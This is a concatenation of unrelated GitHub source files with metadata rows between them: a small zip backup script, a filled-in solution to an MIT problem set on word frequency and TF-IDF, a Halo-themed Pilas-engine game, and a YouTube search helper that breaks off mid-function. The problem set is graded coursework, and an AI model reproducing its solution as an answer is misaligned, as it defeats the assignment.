我们使用标准的zip命令,它通常默认地随Linux/Unix发行版提供。Windows用户可以使用Info-Zip程序。注意你可以使用任何地存档命令,
只要它有命令行界面就可以了,那样的话我们可以从我们的脚本中传递参数给它。
"""
import zipfile
def zip_files(files, zip_name):
    zipf = zipfile.ZipFile(zip_name, 'w')  # avoid shadowing the builtin zip
    for file in files:
        print('compressing', file)
        zipf.write(file)
    zipf.close()
    print('compressing finished')
files = ['D:\I\'M\\usedbypython\\1.txt']  # file locations; separate multiple files with ","
zip_file = 'D:\I\'M\\usedbypython\\2.zip'  # name of the zip archive
zip_files(files, zip_file)
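# The docstring above describes shelling out to the standard "zip" command,
# while the code uses the zipfile module. A minimal sketch of the command-line
# variant, assuming a Unix-like system with "zip" on PATH and a timestamped
# archive name as the docstring suggests. Illustration only.
import os
import subprocess
import time

def zip_files_cli(files, target_dir):
    archive = os.path.join(target_dir, time.strftime('%Y%m%d%H%M%S') + '.zip')
    if subprocess.run(['zip', '-q', archive] + files).returncode == 0:
        print('Successful backup to', archive)
    else:
        print('Backup FAILED')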
|
fivespeedasher/Pieces
|
重要文件创建备份.py
|
重要文件创建备份.py
|
py
| 874 |
python
|
zh
|
code
| 0 |
github-code
|
6
|
71443305149
|
# 6.100A Fall 2023
# Problem Set 3
# Name: <insert name>
# Collaborators: <insert collaborators>
"""
Description:
Computes the similarity between two texts using two different metrics:
(1) shared words, and (2) term frequency-inverse document
frequency (TF-IDF).
"""
import string
import math
import re
### DO NOT MODIFY THIS FUNCTION
def load_file(filename):
"""
Args:
filename: string, name of file to read
Returns:
string, contains file contents
"""
# print("Loading file %s" % filename)
inFile = open(filename, 'r')
line = inFile.read().strip()
for char in string.punctuation:
line = line.replace(char, "")
inFile.close()
return line.lower()
### Problem 1: Prep Data ###
def prep_data(input_text):
"""
Args:
input_text: string representation of text from file,
assume the string is made of lowercase characters
Returns:
list representation of input_text, where each word is a different element in the list
"""
return input_text.split()
### Problem 2: Get Frequency ###
def get_frequencies(word_list):
"""
Args:
word_list: list of strings, all are made of lowercase characters
Returns:
dictionary that maps string:int where each string
is a word in l and the corresponding int
is the frequency of the word in l
"""
outputDict = {}
for word in word_list:
if word in outputDict:
outputDict[word] += 1
else:
outputDict[word] = 1
return outputDict
### Problem 3: Get Words Sorted by Frequency
def get_words_sorted_by_frequency(frequencies_dict):
"""
Args:
frequencies_dict: dictionary that maps a word to its frequency
Returns:
list of words sorted by decreasing frequency with ties broken
by alphabetical order
"""
return sorted(frequencies_dict, key=lambda x: (-frequencies_dict[x], x))
### Problem 4: Most Frequent Word(s) ###
def get_most_frequent_words(dict1, dict2):
"""
The keys of dict1 and dict2 are all lowercase,
you will NOT need to worry about case sensitivity.
Args:
dict1: frequency dictionary for one text
dict2: frequency dictionary for another text
Returns:
list of the most frequent word(s) in the input dictionaries
The most frequent word:
* is based on the combined word frequencies across both dictionaries.
If a word occurs in both dictionaries, consider the sum the
frequencies as the combined word frequency.
* need not be in both dictionaries, i.e it can be exclusively in
dict1, dict2, or shared by dict1 and dict2.
If multiple words are tied (i.e. share the same highest frequency),
return an alphabetically ordered list of all these words.
"""
    combined_dict = {}
    for key in dict1:
        combined_dict[key] = combined_dict.get(key, 0) + dict1[key]
    for key in dict2:
        combined_dict[key] = combined_dict.get(key, 0) + dict2[key]
    highest = max(combined_dict.values())
    return sorted([key for key in combined_dict if combined_dict[key] == highest])
### Problem 5: Similarity ###
def calculate_similarity_score(dict1, dict2):
"""
The keys of dict1 and dict2 are all lowercase,
you will NOT need to worry about case sensitivity.
Args:
dict1: frequency dictionary of words of text1
dict2: frequency dictionary of words of text2
Returns:
float, a number between 0 and 1, inclusive
representing how similar the words/texts are to each other
The difference in words/text frequencies = DIFF sums "frequencies"
over all unique elements from dict1 and dict2 combined
based on which of these three scenarios applies:
* If an element occurs in dict1 and dict2 then
get the difference in frequencies
* If an element occurs only in dict1 then take the
frequency from dict1
* If an element occurs only in dict2 then take the
frequency from dict2
The total frequencies = ALL is calculated by summing
all frequencies in both dict1 and dict2.
Return 1-(DIFF/ALL) rounded to 2 decimal places
"""
    diff = 0
    for key in dict1:
        if key in dict2:
            diff += abs(dict1[key] - dict2[key])
        else:
            diff += dict1[key]
    for key in dict2:
        if key not in dict1:
            diff += dict2[key]
    total = sum(dict1.values()) + sum(dict2.values())  # avoid shadowing the builtin all
    return round(1 - (diff / total), 2)
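# Worked example (illustration): dict1 = {'a': 2, 'b': 1}, dict2 = {'a': 1, 'c': 1}
# DIFF = |2 - 1| + 1 + 1 = 3, ALL = 3 + 2 = 5, score = round(1 - 3/5, 2) = 0.4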
### Problem 6: Finding TF-IDF ###
def get_tf(text_file):
"""
Args:
text_file: name of file in the form of a string
Returns:
a dictionary mapping each word to its TF
* TF is calculated as TF(i) = (number times word *i* appears
in the document) / (total number of words in the document)
* Think about how we can use get_frequencies from earlier
"""
    returnDict = {}
    freqs = get_frequencies(prep_data(load_file(text_file)))  # avoid shadowing the builtin dict
    total = sum(freqs.values())
    for key in freqs:
        returnDict[key] = freqs[key] / total
    return returnDict
def get_idf(text_files):
"""
Args:
text_files: list of names of files, where each file name is a string
Returns:
a dictionary mapping each word to its IDF
* IDF is calculated as IDF(i) = log_10(total number of documents / number of
documents with word *i* in it), where log_10 is log base 10 and can be called
with math.log10()
"""
    doc_counts = {}
    for file in text_files:
        for key in get_frequencies(prep_data(load_file(file))):
            doc_counts[key] = doc_counts.get(key, 0) + 1
    for key in doc_counts:
        doc_counts[key] = math.log10(len(text_files) / doc_counts[key])
    return doc_counts
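# Worked example (illustration), matching the expected test output below: with 2
# documents where 'hello' appears in both and 'world' in only one,
# IDF('hello') = log10(2/2) = 0.0 and IDF('world') = log10(2/1) ≈ 0.301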
def get_tfidf(text_file, text_files):
"""
Args:
text_file: name of file in the form of a string (used to calculate TF)
text_files: list of names of files, where each file name is a string
(used to calculate IDF)
Returns:
a sorted list of tuples (in increasing TF-IDF score), where each tuple is
of the form (word, TF-IDF). In case of words with the same TF-IDF, the
words should be sorted in increasing alphabetical order.
* TF-IDF(i) = TF(i) * IDF(i)
"""
tf = get_tf(text_file)
idf = get_idf(text_files)
return sorted([(key, tf[key] * idf[key]) for key in tf], key=lambda x: (x[1], x[0]))
if __name__ == "__main__":
pass
##Uncomment the following lines to test your implementation
# Tests Problem 1: Prep Data
test_directory = "tests/student_tests/"
hello_world, hello_friend = load_file(test_directory + 'hello_world.txt'), load_file(test_directory + 'hello_friends.txt')
world, friend = prep_data(hello_world), prep_data(hello_friend)
# print(world) ## should print ['hello', 'world', 'hello', 'there']
# print(friend) ## should print ['hello', 'friends']
## Tests Problem 2: Get Frequencies
world_word_freq = get_frequencies(world)
friend_word_freq = get_frequencies(friend)
# print(world_word_freq) ## should print {'hello': 2, 'world': 1, 'there': 1}
# print(friend_word_freq) ## should print {'hello': 1, 'friends': 1}
# ## Tests Problem 3: Get Words Sorted by Frequency
world_words_sorted_by_freq = get_words_sorted_by_frequency(world_word_freq)
friend_words_sorted_by_freq = get_words_sorted_by_frequency(friend_word_freq)
# print(world_words_sorted_by_freq) ## should print ['hello', 'there', 'world']
# print(friend_words_sorted_by_freq) ## should print ['friends', 'hello']
## Tests Problem 4: Most Frequent Word(s)
freq1, freq2 = {"hello":5, "world":1}, {"hello":1, "world":5}
most_frequent = get_most_frequent_words(freq1, freq2)
# print(most_frequent) ## should print ["hello", "world"]
## Tests Problem 5: Similarity
test_directory = "tests/student_tests/"
hello_world, hello_friend = load_file(test_directory + 'hello_world.txt'), load_file(test_directory + 'hello_friends.txt')
world, friend = prep_data(hello_world), prep_data(hello_friend)
world_word_freq = get_frequencies(world)
friend_word_freq = get_frequencies(friend)
word_similarity = calculate_similarity_score(world_word_freq, friend_word_freq)
# print(word_similarity) # should print 0.33
## Tests Problem 6: Find TF-IDF
text_file = 'tests/student_tests/hello_world.txt'
text_files = ['tests/student_tests/hello_world.txt', 'tests/student_tests/hello_friends.txt']
tf = get_tf(text_file)
idf = get_idf(text_files)
tf_idf = get_tfidf(text_file, text_files)
# print(tf) ## should print {'hello': 0.5, 'world': 0.25, 'there': 0.25}
# print(idf) ## should print {'there': 0.3010299956639812, 'world': 0.3010299956639812, 'hello': 0.0, 'friends': 0.3010299956639812}
print(tf_idf) ## should print [('hello', 0.0), ('there', 0.0752574989159953), ('world', 0.0752574989159953)]
|
Shad0wSeven/6.100A
|
1_ps3/document_distance.py
|
document_distance.py
|
py
| 8,407 |
python
|
en
|
code
| 1 |
github-code
|
6
|
73860373627
|
# coding: utf-8
import pilasengine
import random
puntos = 0
pilas = pilasengine.iniciar()
sonido_menu = pilas.sonidos.cargar('Z_Spirit_Of_Fire.wav')
sonido_nivel_1 = pilas.sonidos.cargar('Z_Nightfall.wav')
sonido_nivel_2 = pilas.sonidos.cargar('Z_Just_Ad_Nauseam.wav')
sonido_del_final = pilas.sonidos.cargar('Z_Know_Your_Enemie.wav')
##############################
## --------------- My Characters --------------- ##
##############################
class Chief(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Jefe.png'
self.x = -285
self.y = -210
self.escala = 0.05
self.radio_de_colision = 25
self.aprender("puedeexplotar")
self.aprender("disparar", municion = 'Municion')
def actualizar(self):
if pilas.control.izquierda:
self.x -= 5
if pilas.control.derecha:
self.x += 5
if pilas.control.abajo:
self.y -= 5
if pilas.control.arriba:
self.y += 5
if self.x >= 250:
self.x = 250
if self.x <= -285:
self.x = -285
if self.y >= 220:
self.y = 220
if self.y <= -210:
self.y = -210
class ChiefSuperior(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Jefe.png'
self.x = -285
self.y = -210
self.escala = 0.05
self.radio_de_colision = 25
self.aprender("puedeexplotar")
self.aprender("disparar", municion = 'Municion')
def actualizar(self):
if pilas.control.izquierda:
self.x -= 5
if pilas.control.derecha:
self.x += 5
if pilas.control.abajo:
self.y -= 5
if pilas.control.arriba:
self.y += 5
if self.x > 80:
self.x = -285
if self.x <= -285:
self.x = -285
if self.y >= 220:
self.y = 220
if self.y <= -210:
self.y = -210
class Plus(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = pilas.imagenes.cargar('Mejora.png')
self.radio_de_colision = 20
self.escala = 0.20
self.x = 100
self.y = random.randint(-100,100)
self.pilas.utils.interpolar(self, 'x', -365, duracion=5, tipo='gradual')
if self.x == -300:
self.eliminar()
class ChiefPlus(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'JefeSPNRk.png'
self.x = self.x
self.y = self.y
self.escala = 0.05
self.radio_de_colision = 25
self.aprender("puedeexplotar")
self.aprender("disparar", municion = 'Cohete')
class DestructorPlus(pilasengine.actores.ActorInvisible):
def iniciar(self):
self.x = 300
self.barraPP = pilas.actores.Energia(50,225,progreso=100, ancho=500, alto=10, color_relleno = pilasengine.colores.verde)
def actualizar(self):
self.barraPP.progreso=self.barraPP.progreso - 1
if self.barraPP.progreso==0:
self.x = 0
self.barraPP.eliminar()
self.figura_de_colision = pilas.fisica.Rectangulo(0, 0, 666, 666, sensor=True, dinamica=False)
class Municion(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Sniper.png'
self.figura_de_colision = pilas.fisica.Rectangulo(-285, -210, 17, 45, sensor=True, dinamica=False)
def actualizar(self):
self.figura_de_colision.x = self.x
self.figura_de_colision.y = self.y
if self.x > 300:
self.eliminar()
self.figura_de_colision.eliminar()
class Cohete(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'SPNRk.png'
self.aprender("puedeexplotar")
self.figura_de_colision = pilas.fisica.Rectangulo(-285, -210, 17, 45, sensor=True, dinamica=False)
def actualizar(self):
self.figura_de_colision.x = self.x
self.figura_de_colision.y = self.y
if self.x > 300:
self.eliminar()
self.figura_de_colision.eliminar()
class Elite(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Enemigo_Elite.png'
self.escala = 0.07
self.y = 270
self.x = random.randint(-300, 300)
self.radio_de_colision = 25
def actualizar(self):
self.y -= 5
if self.y <= -230:
self.eliminar()
class AtrioxBoss(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Atriox.png'
self.escala = 0.40
self.x = 215
self.y = -50
self.figura_de_colision = pilas.fisica.Rectangulo(self.x, self.y, 215, 450, sensor=True, dinamica=False)
class BansheeBoss(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = pilas.imagenes.cargar('Banshee.png')
self.radio_de_colision = 35
self.escala = 0.1
self.x = 195
self.y = random.randint(-200, 255)
self.aprender( pilas.habilidades.PuedeExplotarConHumo )
self.pilas.utils.interpolar(self, 'x', -375, duracion=1, tipo='lineal')
self.pilas.utils.interpolar(self, 'y', random.randint(-300, 300), duracion=1, tipo='lineal')
def actualizar(self):
if self.x <= -365:
self.eliminar()
class Grunt(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Puntos_Grunt.png'
self.escala = 0.05
self.radio_de_colision = 17
self.aprender( pilas.habilidades.PuedeExplotarConHumo )
self.izquierda = 300
self.y = random.randint(-210,50)
def actualizar(self):
self.x-=5
if self.x < -300:
self.eliminar()
##########################
## --------------- Buttons --------------- ##
##########################
class Boton_Menu(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Casco_Mark.png'
self.x = -280
self.y = 180
reiniciar_texto = pilas.interfaz.Boton("Volver al Menu")
reiniciar_texto.conectar(self.escena_menu)
reiniciar_texto.x = -265
reiniciar_texto.y = 220
self.cuando_hace_click = self.escena_menu
def escena_menu(self):
sonido_del_final.detener()
self.pilas.escenas.MenuInicio()
class Boton_Nivel_1(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Casco_Chief.jpg'
self.x = 0
self.y = -30
self.escala = 0.25
reiniciar_texto = pilas.interfaz.IngresoDeTexto(" Click en el icono para iniciar o reiniciar.")
reiniciar_texto.x = 0
reiniciar_texto.y = -115
self.cuando_hace_click = self.escena_inicial
def escena_inicial(self):
sonido_menu.detener()
sonido_del_final.detener()
self.pilas.escenas.Nivel_1()
class Boton_Nivel_2(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Casco_Chief.jpg'
self.x = 0
self.y = -30
self.escala = 0.25
reiniciar_texto = pilas.interfaz.IngresoDeTexto(" Click en el icono para iniciar o reiniciar.")
reiniciar_texto.x = 0
reiniciar_texto.y = -115
self.cuando_hace_click = self.escena_inicial
def escena_inicial(self):
sonido_del_final.detener()
self.pilas.escenas.Nivel_2()
class Boton_Info(pilasengine.actores.Actor):
def iniciar(self):
self.imagen = 'Casco_Mark.png'
self.x = -280
self.y = 180
reiniciar_texto = pilas.interfaz.Boton("Informacion")
reiniciar_texto.conectar(self.escena_info)
reiniciar_texto.x = -270
reiniciar_texto.y = 220
self.cuando_hace_click = self.escena_info
def escena_info(self):
sonido_menu.reproducir(repetir = True)
self.pilas.escenas.Info()
###########################
## --------------- Scenes --------------- ##
###########################
class MenuInicio(pilasengine.escenas.Escena):
def iniciar(self):
fondo_inicio = pilas.fondos.Fondo()
fondo_inicio.imagen = pilas.imagenes.cargar('Menu.jpg')
fondo_inicio.x = 75
fondo_inicio.escala = 0.65
self.boton()
def boton(self):
pilas.actores.Boton_Nivel_1()
pilas.actores.Boton_Info()
class Info(pilasengine.escenas.Escena):
def iniciar(self):
fondo_info = pilas.fondos.Fondo()
fondo_info.imagen = pilas.imagenes.cargar('Eclipse.png')
fondo_info.x = 40
fondo_info.escala = 0.85
textoT = pilas.interfaz.IngresoDeTexto(" TIBERPLANOIBE")
textoT.y = 225
texto = pilas.actores.Texto("Todo el contenido grafico y auditivo de\neste juego ha sido obtenido de la popular\nsaga \"Halo\". Nada de este material es de\nmi autoria.\nPor otro lado, todo el codigo ha sido\nescrito por mi, usando esta herramienta\ndenominada \"Pilas-engine\".\nAtte. Danilo A. Ochoa Hidalgo.")
texto.x = 70
texto.y = -100
self.boton()
def boton(self):
pilas.actores.Boton_Menu()
class Nivel_1(pilasengine.escenas.Escena):
def iniciar(self):
global puntos
sonido_nivel_1.reproducir(repetir = True)
homunculus = pilas.fondos.Fondo()
homunculus.imagen = pilas.imagenes.cargar('Fondo.jpg')
homunculus.escala = 0.45
texto = pilas.actores.Texto("Debes conseguir 100:")
texto.x = 0
texto.y = 225
self.puntaje = self.pilas.actores.Puntaje(150, 225, color=pilas.colores.blanco)
self.puntaje.definir(puntos)
self.pilas.actores.Chief()
self.pilas.tareas.siempre(0.5,self.crear_baneador)
self.pilas.tareas.siempre(1,self.crear_chupa_pitos)
self.pilas.colisiones.agregar('Chief','Elite', self.cuando_elite_toca)
self.pilas.colisiones.agregar('Municion','Grunt', self.cuando_municion_toca)
def crear_baneador(self):
self.pilas.actores.Elite()
def crear_chupa_pitos(self):
self.pilas.actores.Grunt()
def cuando_elite_toca(self, chief, elite):
chief.eliminar()
self.puntaje = 0
if self.puntaje == 0:
self.pilas.escena_actual().tareas.eliminar_todas()
sonido_nivel_1.detener()
self.pilas.escenas.Perdedor()
def cuando_municion_toca(self, municion, grunt):
global puntos
grunt.eliminar()
puntos += 5
self.puntaje.aumentar(5)
if puntos == 100:
self.pilas.escena_actual().tareas.eliminar_todas()
sonido_nivel_1.detener()
self.pilas.escenas.Nivel_2()
class Nivel_2(pilasengine.escenas.Escena):
def iniciar(self):
sonido_nivel_2.reproducir(repetir = True)
homunculus = pilas.fondos.Fondo()
homunculus.imagen = pilas.imagenes.cargar('Fondox2.jpg')
homunculus.escala = 0.45
self.barraP = pilas.actores.Energia(-260,225,progreso=100, ancho=100, alto=20, color_relleno = pilasengine.colores.verde)
self.barraZ = pilas.actores.Energia(0,-225,progreso=100, ancho=500, alto=20, color_relleno = pilasengine.colores.verde)
self.pilas.actores.ChiefSuperior()
self.pilas.actores.AtrioxBoss()
self.pilas.actores.Plus()
self.pilas.tareas.siempre(0.5,self.ban)
self.pilas.tareas.siempre(15,self.crear_mejora)
self.pilas.colisiones.agregar('ChiefSuperior','Plus', self.cuando_toca_plus)
self.pilas.colisiones.agregar('Cohete','AtrioxBoss', self.cuando_cohete_toca_atriox)
self.pilas.colisiones.agregar('Municion','AtrioxBoss', self.cuando_municion_toca_atriox)
self.pilas.colisiones.agregar('ChiefSuperior','BansheeBoss', self.cuando_toca_ban)
self.pilas.colisiones.agregar('ChiefPlus','DestructorPlus', self.cuando_plus_termina)
def destruye_plus(self):
self.pilas.actores.DestructorPlus()
def crear_mejora(self):
self.pilas.actores.Plus()
def ban(self):
self.pilas.actores.BansheeBoss()
def cuando_toca_plus(self, puck, plus):
plus.eliminar()
puck.eliminar()
self.pilas.actores.ChiefPlus()
self.pilas.actores.DestructorPlus()
def cuando_plus_termina(self, pplus, destructor):
pplus.eliminar()
destructor.eliminar()
self.pilas.actores.ChiefSuperior()
self.barraP.progreso=self.barraP.progreso + 20
def cuando_cohete_toca_atriox(self, cohete, atrioxboss):
cohete.eliminar()
self.barraZ.progreso=self.barraZ.progreso - 2
def cuando_municion_toca_atriox(self, municion, atrioxboss):
municion.eliminar()
self.barraZ.progreso=self.barraZ.progreso - 0.1
if self.barraZ.progreso<=200:
self.barraZ.color_relleno=pilasengine.colores.amarillo
if self.barraZ.progreso<=100:
self.barraZ.color_relleno=pilasengine.colores.naranja
if self.barraZ.progreso<=50:
self.barraZ.color_relleno=pilasengine.colores.rojo
if self.barraZ.progreso<=0:
self.pilas.escena_actual().tareas.eliminar_todas()
sonido_nivel_2.detener()
self.pilas.escenas.Ganador()
def cuando_toca_ban(self, chief, ban):
ban.eliminar()
self.barraP.progreso=self.barraP.progreso - 20
if self.barraP.progreso<=70:
self.barraP.color_relleno=pilasengine.colores.amarillo
if self.barraP.progreso<=50:
self.barraP.color_relleno=pilasengine.colores.naranja
if self.barraP.progreso<=30:
self.barraP.color_relleno=pilasengine.colores.rojo
if self.barraP.progreso<=0:
self.pilas.escena_actual().tareas.eliminar_todas()
sonido_nivel_2.detener()
self.pilas.escenas.Perdedor_x2()
class Ganador(pilasengine.escenas.Escena):
def iniciar(self):
sonido_del_final.reproducir(repetir = True)
fondo_ganador = pilas.fondos.Fondo()
fondo_ganador.imagen = pilas.imagenes.cargar('Ganar.jpg')
fondo_ganador.escala = 0.5
fondo_ganador.x = -150
texto = pilas.interfaz.Boton("Luego de la caida de \"Atriox\" el Jefe Maestro")
texto1 = pilas.interfaz.Boton("se encontro perdido en el espacio.")
texto2 = pilas.interfaz.Boton("Como nadie logro dar con su paradero")
texto3 = pilas.interfaz.Boton("la UNSC lo declaro como desaparecido en combate.")
texto.y = 100
texto1.y = 40
texto2.y = -20
texto3.y = -80
pilas.actores.Boton_Menu()
class Perdedor(pilasengine.escenas.Escena):
def iniciar(self):
global puntos
puntos = 0
sonido_del_final.reproducir()
fondo_perdedor = pilas.fondos.Fondo()
fondo_perdedor.imagen = pilas.imagenes.cargar('Perder.jpg')
fondo_perdedor.escala = 1.5
texto = pilas.interfaz.Boton("Luego de la caida del Jefe Maestro,")
texto1 = pilas.interfaz.Boton("y sin nadie que pudiera proteger,")
texto2 = pilas.interfaz.Boton("la Tierra fue arrasada hasta convertirse en polvo.")
texto3 = pilas.interfaz.Boton("Paz en la tumba de Jhon-117")
texto.x = 0
texto.y = 180
texto1.x = 0
texto1.y = 140
texto2.x = 0
texto2.y =100
texto3.x = 0
texto3.y = -180
self.pilas.actores.Boton_Nivel_1()
self.pilas.actores.Boton_Menu()
class Perdedor_x2(pilasengine.escenas.Escena):
def iniciar(self):
global puntos
puntos = 0
sonido_del_final.reproducir()
fondo_perdedor = pilas.fondos.Fondo()
fondo_perdedor.imagen = pilas.imagenes.cargar('Perderx2.jpg')
fondo_perdedor.escala = 1.3
fondo_perdedor.x = 180
fondo_perdedor.y = -80
texto = pilas.interfaz.Boton("Con Atriox al mando de los \"Desterrados\",")
texto1 = pilas.interfaz.Boton("y sin nadie en pie para proteger nuestro hogar,")
texto2 = pilas.interfaz.Boton("nuestro planeta se vio consumido por la ambicion del Brute.")
texto3 = pilas.interfaz.Boton("Ahora nuestro legado ha llegado a su fin.")
texto.x = 0
texto.y = 180
texto1.x = 0
texto1.y = 140
texto2.x = 0
texto2.y =100
texto3.x = 0
texto3.y = -180
self.pilas.actores.Boton_Nivel_2()
self.pilas.actores.Boton_Menu()
#############################
## --------------- Bindings --------------- ##
#############################
pilas.escenas.vincular(MenuInicio)
pilas.escenas.vincular(Info)
pilas.escenas.vincular(Nivel_1)
pilas.escenas.vincular(Nivel_2)
pilas.escenas.vincular(Ganador)
pilas.escenas.vincular(Perdedor)
pilas.escenas.vincular(Perdedor_x2)
pilas.actores.vincular(Chief)
pilas.actores.vincular(ChiefSuperior)
pilas.actores.vincular(Plus)
pilas.actores.vincular(ChiefPlus)
pilas.actores.vincular(DestructorPlus)
pilas.actores.vincular(Municion)
pilas.actores.vincular(Cohete)
pilas.actores.vincular(Elite)
pilas.actores.vincular(AtrioxBoss)
pilas.actores.vincular(BansheeBoss)
pilas.actores.vincular(Grunt)
pilas.actores.vincular(Boton_Menu)
pilas.actores.vincular(Boton_Nivel_1)
pilas.actores.vincular(Boton_Nivel_2)
pilas.actores.vincular(Boton_Info)
pilas.escenas.MenuInicio()
pilas.ejecutar()
|
da8ah/UTPL-PilasEngineGame
|
Halo/1.Ejecutable.py
|
1.Ejecutable.py
|
py
| 17,937 |
python
|
es
|
code
| 0 |
github-code
|
6
|
9074380203
|
import requests
import pandas as pd
from pytube import YouTube, Search
import os
from pathlib import Path
from .serializers import *
# Youtube credentials
YOUTUBE_KEY_API = 'YOUR_YOUTUBE_KEY_API'
# Setting url for videos and searching list
SEARCH_URL = 'https://www.googleapis.com/youtube/v3/search'
VIDEOS_URL = 'https://www.googleapis.com/youtube/v3/videos'
# Find users downloads path
DOWNLOAD_PATH = str(Path.home() / 'Downloads')
ABSOLUTE_PATH = None #str(Path.absolute())
# SEARCH PARAMETERS
search_params = {
'key': YOUTUBE_KEY_API,
'q': '', # request.form.get('query')
'part': 'snippet',
'maxResults': 9,
'type': 'video'
}
# VIDEO PARAMETERS
video_params = {
'key': YOUTUBE_KEY_API,
'id': '', #','.join(video_ids),
'part': 'snippet,contentDetails',
'maxResults': 9
}
# Videos for testing
tiesto = [
{'video_id': 'nCg3ufihKyU', 'title': 'Tiësto - The Business (Official Music Video)', 'url': 'https://youtube.com/watch?v=nCg3ufihKyU', 'thumbnail': 'https://i.ytimg.com/vi/nCg3ufihKyU/sddefault.jpg?v=5f6cc459'},
{'video_id': 'taSubkjZUA4', 'title': "Tiësto & Karol G - Don't Be Shy (Official Music Video)", 'url': 'https://youtube.com/watch?v=taSubkjZUA4', 'thumbnail': 'https://i.ytimg.com/vi/taSubkjZUA4/sddefault.jpg?v=61151971'},
{'video_id': '1_4ELAxKrDc', 'title': 'Tiësto & Ava Max - The Motto (Official Music Video)', 'url': 'https://youtube.com/watch?v=1_4ELAxKrDc', 'thumbnail': 'https://i.ytimg.com/vi/1_4ELAxKrDc/sddefault.jpg?v=6183096b'},
{'video_id': '8R_4O3q92Lo', 'title': 'Tiësto - Live from Edge New York City', 'url': 'https://youtube.com/watch?v=8R_4O3q92Lo', 'thumbnail': 'https://i.ytimg.com/vi/8R_4O3q92Lo/sddefault.jpg'},
{'video_id': 'O1M2Dh94gMU', 'title': 'CLUBLIFE by Tiësto Episode 804', 'url': 'https://youtube.com/watch?v=O1M2Dh94gMU', 'thumbnail': 'https://i.ytimg.com/vi/O1M2Dh94gMU/hqdefault.jpg'},
{'video_id': 'r0bhF7SJLYQ', 'title': 'Tiësto & Charli XCX - Hot In It [Official Music Video]', 'url': 'https://youtube.com/watch?v=r0bhF7SJLYQ', 'thumbnail': 'https://i.ytimg.com/vi/r0bhF7SJLYQ/sddefault.jpg?v=62f5cd4d'},
{'video_id': 'nK-7S9HzFjo', 'title': 'TIËSTO MEGAMIX 2022 - Best Songs Of All Time', 'url': 'https://youtube.com/watch?v=nK-7S9HzFjo', 'thumbnail': 'https://i.ytimg.com/vi/nK-7S9HzFjo/sddefault.jpg'},
{'video_id': 'JqUqyUEwTMY', 'title': 'Tiësto - In Search Of Sunrise 4: Latin America CD1', 'url': 'https://youtube.com/watch?v=JqUqyUEwTMY', 'thumbnail': 'https://i.ytimg.com/vi/JqUqyUEwTMY/sddefault.jpg'},
{'video_id': 'kjdOBYTUOzY', 'title': 'TIËSTO @ 15 Years of Tomorrowland 2019 [full set]', 'url': 'https://youtube.com/watch?v=kjdOBYTUOzY', 'thumbnail': 'https://i.ytimg.com/vi/kjdOBYTUOzY/sddefault.jpg?v=5e2216ce'},
{'video_id': 'ontU9cOg354', 'title': 'Tiësto, Jonas Blue & Rita Ora - Ritual (Official Video)', 'url': 'https://youtube.com/watch?v=ontU9cOg354', 'thumbnail': 'https://i.ytimg.com/vi/ontU9cOg354/sddefault.jpg?v=5d0183d9'},
{'video_id': 'e94gack-DJk', 'title': 'Tiësto - Live @ Ultra Music Festival 2022', 'url': 'https://youtube.com/watch?v=e94gack-DJk', 'thumbnail': 'https://i.ytimg.com/vi/e94gack-DJk/sddefault.jpg'},
{'video_id': 'LqCcdtM7Qe4', 'title': 'Tiesto - Silence - Delerium featuring Sarah McLachlan', 'url': 'https://youtube.com/watch?v=LqCcdtM7Qe4', 'thumbnail': 'https://i.ytimg.com/vi/LqCcdtM7Qe4/hqdefault.jpg'},
{'video_id': 'b3mOLJvbBwQ', 'title': 'Tiësto feat. Nelly Furtado - Who Wants To Be Alone', 'url': 'https://youtube.com/watch?v=b3mOLJvbBwQ', 'thumbnail': 'https://i.ytimg.com/vi/b3mOLJvbBwQ/hqdefault.jpg'},
{'video_id': 'VlWOFJJIo9Y', 'title': 'DJ Tiesto - Insomnia', 'url': 'https://youtube.com/watch?v=VlWOFJJIo9Y', 'thumbnail': 'https://i.ytimg.com/vi/VlWOFJJIo9Y/hqdefault.jpg'},
{'video_id': 'Dr1nN__-2Po', 'title': 'Tiësto & KSHMR feat. Vassy - Secrets (Official Music Video)', 'url': 'https://youtube.com/watch?v=Dr1nN__-2Po', 'thumbnail': 'https://i.ytimg.com/vi/Dr1nN__-2Po/sddefault.jpg'},
{'video_id': '2EaE0_gQLw0', 'title': 'Tiësto - Adagio For Strings', 'url': 'https://youtube.com/watch?v=2EaE0_gQLw0', 'thumbnail': 'https://i.ytimg.com/vi/2EaE0_gQLw0/hqdefault.jpg'},
{'video_id': '8tIgN7eICn4', 'title': 'DJ Tiesto - Adagio For Strings', 'url': 'https://youtube.com/watch?v=8tIgN7eICn4', 'thumbnail': 'https://i.ytimg.com/vi/8tIgN7eICn4/hqdefault.jpg'},
{'video_id': '-qgzNwdkV4s', 'title': 'Dj Tiesto - Traffic!', 'url': 'https://youtube.com/watch?v=-qgzNwdkV4s', 'thumbnail': 'https://i.ytimg.com/vi/-qgzNwdkV4s/hqdefault.jpg'},
{'video_id': 'Jbh3GlrRcQ4', 'title': 'Tiësto ft. BT - Love Comes Again (Official Video)', 'url': 'https://youtube.com/watch?v=Jbh3GlrRcQ4', 'thumbnail': 'https://i.ytimg.com/vi/Jbh3GlrRcQ4/sddefault.jpg'}
]
# Main functions
def fetch_videos_from_yt(query, uat_data=None):
if uat_data:
return uat_data
videos = []
video_ids = []
search_params['q'] = query
video_params['q'] = query
    try:
        response = requests.get(SEARCH_URL, params=search_params)
        search_response = response.json()['items']
        for item in search_response:
            video_ids.append(item['id']['videoId'])
    except:
        print('Connection Error')
    if video_ids:
        video_params['id'] = ','.join(video_ids)
        response = requests.get(VIDEOS_URL, params=video_params)
        video_response = response.json()['items']
for video in video_response:
video_data = {
'video_id': video['id'],
'url': f'https://www.youtube.com/watch?v={video["id"]}',
'thumbnail': video['snippet']['thumbnails']['high']['url'],
'title': video['snippet']['title']
}
videos.append(video_data)
return videos
def fetch_videos(query, uat_data=None):
if uat_data:
return uat_data
else:
videos = []
